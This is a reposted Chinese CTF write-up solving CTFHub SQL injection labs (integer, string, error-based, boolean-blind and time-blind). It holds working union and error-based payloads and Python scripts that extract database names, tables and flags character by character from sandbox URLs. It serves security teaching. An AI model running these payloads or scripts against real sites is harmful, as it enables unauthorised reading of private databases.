CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注
- 整数型注入
- 字符型注入
- 报错注入
- 布尔盲注
- 时间盲注
整数型注入
首先输入1查看回显:
可以看到返回了SQL语句及ID和Data数据,查看列数:
1 order by 2 #
当列数为2时回显正常,接着判断回显位:
1111 union select 11,22 #
可以判断出回显点位如上,查看当前数据库版本及数据库名:
1111 union select version(),database() #
查询到当前数据库名为:sqli,继续查询该数据库中的表名:
11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
通过group_concat()函数将所有的表查询出来,得到news和flag两个表,继续查询flag表中的列:
11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
查询到flag表中只有flag一列,查看flag列中的内容:
11111 union select 1,flag from sqli.flag #
得到flag,完成了整形注入
字符型注入
首先尝试输入1查看回显:
可以看到返回了SQL语句及ID和Data数据,因已得知为字符型注入,其注入过程及语句与整形注入一致:
11111' union select 1,flag from sqli.flag #
只是SQL语句闭合方式为id='1'具体参考整形注入
报错注入
先输入1查看回显:
当输入1'判断注入时,得到报错信息:
输入1 #验证:
可以判断出为整形的报错注入,查询数据库名:
1 Union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
通过修改limit 0,1逐个查询表名:
查询出news和flag两个表,继续查询flag表中的列:
1 Union select count(*),concat((select column_name from information_schema.columns where table_schema='sqli' and table_name='flag' limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
得到列名为flag,查看列中的数据:
1 Union select count(*),concat((select flag from flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x
得到flag,完成报错注入
布尔盲注
先输入1查看回显内容:
提示查询成功,但不会回显内容,只有查询语句语法错误是才显示error,尝试查询当前字段长度:
1 order by 2 #
得出当前字段数为2,因为盲注需要猜解大量内容,使用脚本查询当前数据库名:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def database_name():
name = ''
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
r = requests.get(url_db)
if mark in r.text:
name += j
break
print('database_name:', name)
database_name()
得到当前数据库名为:sqli,继续查询表名:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def table_name():
list = []
for i in range(0, 4):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(url_t)
if mark in r.text:
name += k
break
list.append(name)
print('table_name:', list)
table_name()
得到两个表名:news和flag,继续查询flag表中的列:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def columns_name():
list = []
for i in range(0, 3):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(url_c)
if mark in r.text:
name += k
break
list.append(name)
print('column_name:', list)
columns_name()
得到列名也为flag,查询其中内容:
import requests
import string
url = 'http://challenge-65d978df6c107703.sandbox.ctfhub.com:10080/?id='
mark = 'query_success'
def data():
name = ''
for i in range(1, 50):
for j in range(48, 126):
url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (i, j)
r = requests.get(url_d)
if mark in r.text:
name += chr(j)
break
print('data:', name)
data()得到flag:
完成布尔注入
时间盲注
什么内容都不返回,尝试使用脚本进行时间盲注,首先获取数据库名:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def database_name():
name = ''
for i in range(1, 9):
for j in string.ascii_letters:
url_db = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
time_b = time.time()
r = requests.get(url_db)
time_f = time.time()
if time_f-time_b > 2:
name += j
break
print('database_name:', name)
database_name()
得到数据库名为sqli,继续查询表名:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def table_name():
list = []
for i in range(0, 2):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_t = url + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_b = time.time()
r = requests.get(url_t)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print('table_name:', list)
table_name()
得到两个表名:news和flag,继续查询flag表中的列:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def columns_name():
list = []
for i in range(0, 1):
name = ''
for j in range(1, 9):
for k in string.ascii_letters:
url_c = url + 'if(substr((select column_name from information_schema.columns where table_name="flag" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time_b = time.time()
r = requests.get(url_c)
time_f = time.time()
if time_f - time_b > 2:
name += k
break
list.append(name)
print('column_name:', list)
columns_name()
得到列名也为flag,查询其中内容:
import requests
import string
import time
url = 'http://challenge-c2b00c039a834223.sandbox.ctfhub.com:10080/?id='
def data():
name = ''
for i in range(1, 50):
for j in range(48, 126):
url_d = url + 'if(ascii(substr((select flag from flag),%d,1))=%d,sleep(3),1)' % (i, j)
r = requests.get(url_d)
time_b = time.time()
r = requests.get(url_d)
time_f = time.time()
if time_f-time_b > 2:
name += chr(j)
print(name)
break
print('data:', name)
data()得到flag:
完成时间盲注
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
